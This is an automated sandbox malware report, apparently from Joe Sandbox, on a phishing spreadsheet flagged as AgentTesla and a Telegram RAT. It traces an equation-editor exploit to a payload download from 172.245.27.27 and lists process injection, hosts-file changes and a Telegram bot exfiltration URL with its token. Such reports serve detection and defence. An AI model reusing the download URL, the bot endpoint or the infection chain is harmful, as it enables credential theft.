                    Source: Yara matchFile source: 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2404, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR
                    Source: Yara matchFile source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2404, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.vbc.exe.35b1ce0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.985108064.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.985373041.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2404, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts211
                    Windows Management Instrumentation                    		Path Interception311
                    Process Injection                    		111
                    Masquerading                    		OS Credential Dumping311
                    Security Software Discovery                    		Remote Services11
                    Archive Collected Data                    		Exfiltration Over Other Network Medium1
                    Web Service                    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Scripting                    		Boot or Logon Initialization Scripts1
                    Extra Window Memory Injection                    		1
                    File and Directory Permissions Modification                    		LSASS Memory131
                    Virtualization/Sandbox Evasion                    		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                    Encrypted Channel                    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain Accounts23
                    Exploitation for Client Execution                    		Logon Script (Windows)Logon Script (Windows)1
                    Disable or Modify Tools                    		Security Account Manager1
                    Application Window Discovery                    		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration33
                    Ingress Tool Transfer                    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)131
                    Virtualization/Sandbox Evasion                    		NTDS1
                    Remote System Discovery                    		Distributed Component Object ModelInput CaptureScheduled Transfer2
                    Non-Application Layer Protocol                    		SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script311
                    Process Injection                    		LSA Secrets1
                    File and Directory Discovery                    		SSHKeyloggingData Transfer Size Limits22
                    Application Layer Protocol                    		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    Deobfuscate/Decode Files or Information                    		Cached Domain Credentials114
                    System Information Discovery                    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                    Scripting                    		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job2
                    Obfuscated Files or Information                    		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)2
                    Software Packing                    		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                    Extra Window Memory Injection                    		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 626166 Sample: Bank TT slip.xlsx Startdate: 13/05/2022 Architecture: WINDOWS Score: 100 30 api.telegram.org 2->30 34 Found malware configuration 2->34 36 Malicious sample detected (through community Yara rule) 2->36 38 Antivirus detection for URL or domain 2->38 40 16 other signatures 2->40 8 EQNEDT32.EXE 12 2->8         started        13 EXCEL.EXE 33 24 2->13         started        signatures3 process4 dnsIp5 32 172.245.27.27, 49171, 80 AS-COLOCROSSINGUS United States 8->32 24 C:\Users\user\AppData\Local\...\SOA[1].exe, PE32 8->24 dropped 26 C:\Users\Public\vbc.exe, PE32 8->26 dropped 48 Office equation editor establishes network connection 8->48 50 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 8->50 15 vbc.exe 1 5 8->15         started        28 C:\Users\user\Desktop\~$Bank TT slip.xlsx, data 13->28 dropped file6 signatures7 process8 signatures9 52 Multi AV Scanner detection for dropped file 15->52 54 Machine Learning detection for dropped file 15->54 56 Writes to foreign memory regions 15->56 58 2 other signatures 15->58 18 RegSvcs.exe 2 15->18         started        process10 file11 22 C:\Windows\System32\drivers\etc\hosts, ASCII 18->22 dropped 42 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 18->42 44 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 18->44 46 Modifies the hosts file 18->46 signatures12

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Bank TT slip.xlsx20%MetadefenderBrowse
                    Bank TT slip.xlsx32%ReversingLabsDocument-Office.Exploit.CVE-2018-0802

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\Public\vbc.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe46%ReversingLabsWin32.Trojan.Lazy
                    C:\Users\Public\vbc.exe46%ReversingLabsWin32.Trojan.Lazy

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    5.0.RegSvcs.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                    5.0.RegSvcs.exe.400000.1.unpack100%AviraTR/Spy.Gen8Download File
                    5.0.RegSvcs.exe.400000.2.unpack100%AviraTR/Spy.Gen8Download File
                    5.0.RegSvcs.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                    5.2.RegSvcs.exe.400000.0.unpack100%AviraHEUR/AGEN.1203035Download File
                    5.0.RegSvcs.exe.400000.3.unpack100%AviraTR/Spy.Gen8Download File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                    http://DynDns.comDynDNS0%URL Reputationsafe
                    http://172.245.27.27/SOA.exe100%Avira URL Cloudmalware
                    Http://172.245.27.27/SOA.exeK100%Avira URL Cloudmalware
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                    http://172.245.27.27/SOA.exeX100%Avira URL Cloudmalware
                    http://172.245.27.27/SOA.exehhC:100%Avira URL Cloudmalware
                    Http://172.245.27.27/SOA.exej100%Avira URL Cloudmalware
                    https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                    http://bLHfhV.com0%Avira URL Cloudsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                    http://172.245.27.27/SOA.exeB100%Avira URL Cloudmalware

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.telegram.org
                    		149.154.167.220
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://172.245.27.27/SOA.exetrue
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:HTTP/1.1RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://DynDns.comDynDNSRegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      Http://172.245.27.27/SOA.exeKEQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://172.245.27.27/SOA.exeXEQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://172.245.27.27/SOA.exehhC:EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      Http://172.245.27.27/SOA.exejEQNEDT32.EXE, 00000002.00000002.962678277.0000000003680000.00000004.00000800.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/vbc.exe, 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                        		high
                        https://api.ipify.org%GETMozilla/5.0RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		low
                        http://bLHfhV.comRegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocumentdocument-----RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipvbc.exe, 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://172.245.27.27/SOA.exeBEQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          172.245.27.27
                          		unknownUnited States
                          		36352AS-COLOCROSSINGUStrue

                          General Information

                          Joe Sandbox Version:34.0.0 Boulder Opal
                          Analysis ID:626166
                          Start date and time: 13/05/202216:57:002022-05-13 16:57:00 +02:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 8m 16s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Sample file name:Bank TT slip.xlsx
                          Cookbook file name:defaultwindowsofficecookbook.jbs
                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                          Number of analysed new started processes analysed:6
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.adwa.expl.evad.winXLSX@6/18@1/1
                          EGA Information:
                          • Successful, ratio: 66.7%
                          HDC Information:
                          • Successful, ratio: 2.6% (good quality ratio 1.5%)
                          • Quality average: 28.2%
                          • Quality standard deviation: 26.9%
                          HCA Information:
                          • Successful, ratio: 97%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Found application associated with file extension: .xlsx
                          • Adjust boot time
                          • Enable AMSI
                          • Found Word or Excel or PowerPoint or XPS Viewer
                          • Attach to Office via COM
                          • Scroll down
                          • Close Viewer

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe
                          • TCP Packets have been reduced to 100
                          • Execution Graph export aborted for target RegSvcs.exe, PID 1452 because it is empty
                          • Report size getting too big, too many NtCreateFile calls found.
                          • Report size getting too big, too many NtEnumerateValueKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: Bank TT slip.xlsx

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          16:57:42API Interceptor77x Sleep call for process: EQNEDT32.EXE modified
                          16:57:46API Interceptor69x Sleep call for process: vbc.exe modified
                          16:57:57API Interceptor750x Sleep call for process: RegSvcs.exe modified

                          Joe Sandbox View / Context

                          IPs

                          No context

                          Domains

                          No context

                          ASNs

                          No context

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe

                          Download File
                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:downloaded
                          Size (bytes):833024
                          Entropy (8bit):7.018221482722969
                          Encrypted:false
                          SSDEEP:12288:7HE2ISZ5m4fuOjUTPXmkHz/b9m+DhLrRvoXSf+bnl8tTac2aVzBQXOCmxqogCSsV:b3NUXmkTjZFRvoCmblML
                          MD5:F18604D5FC3E2930E85C403E0E80A459
                          SHA1:AA0517C10C333F9A9A64EBA154EA915464EBF2BB
                          SHA-256:46584937F3C753886BB38030047DD11C73D46BF01C5E52A95118108634EE2081
                          SHA-512:C39BD01BCA62779434B0508BC66972CD7030153469F631B425E1B77AF59FD7DB1A26A837EA2B7440C9F93CD538C43C2F2005EBCF34B982C03CEED71A4C3B685C
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 46%
                          Reputation:low
                          IE Cache URL:http://172.245.27.27/SOA.exe
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....|b..............P.................. ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............?...........f...............................................*..(#...*&..($....*.s%........s&........s'........s(........s)........*Z........o1...........*&..(2....*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{..

                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18D80E7.png

                          Download File
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                          Category:dropped
                          Size (bytes):2647
                          Entropy (8bit):7.8900124483490135
                          Encrypted:false
                          SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
                          MD5:E46357D82EBC866EEBDA98FA8F94B385
                          SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
                          SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
                          SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7

                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\194FA29.jpeg

                          Download File
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                          Category:dropped
                          Size (bytes):4396
                          Entropy (8bit):7.884233298494423
                          Encrypted:false
                          SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                          MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                          SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                          SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                          SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                          Malicious:false
                          Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.

                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3095CF2A.png

                          Download File
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                          Category:dropped
                          Size (bytes):11303
                          Entropy (8bit):7.909402464702408
                          Encrypted:false
                          SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                          MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                          SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                          SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                          SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                          Malicious:false
                          Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\317DF694.png

                          Download File
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                          Category:dropped
                          Size (bytes):10202
                          Entropy (8bit):7.870143202588524
                          Encrypted:false
                          SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                          MD5:66EF10508ED9AE9871D59F267FBE15AA
                          SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                          SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                          SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                          Malicious:false
                          Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..

                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\63404123.png

                          Download File
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                          Category:dropped
                          Size (bytes):10202
                          Entropy (8bit):7.870143202588524
                          Encrypted:false
                          SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                          MD5:66EF10508ED9AE9871D59F267FBE15AA
                          SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                          SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                          SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                          Malicious:false
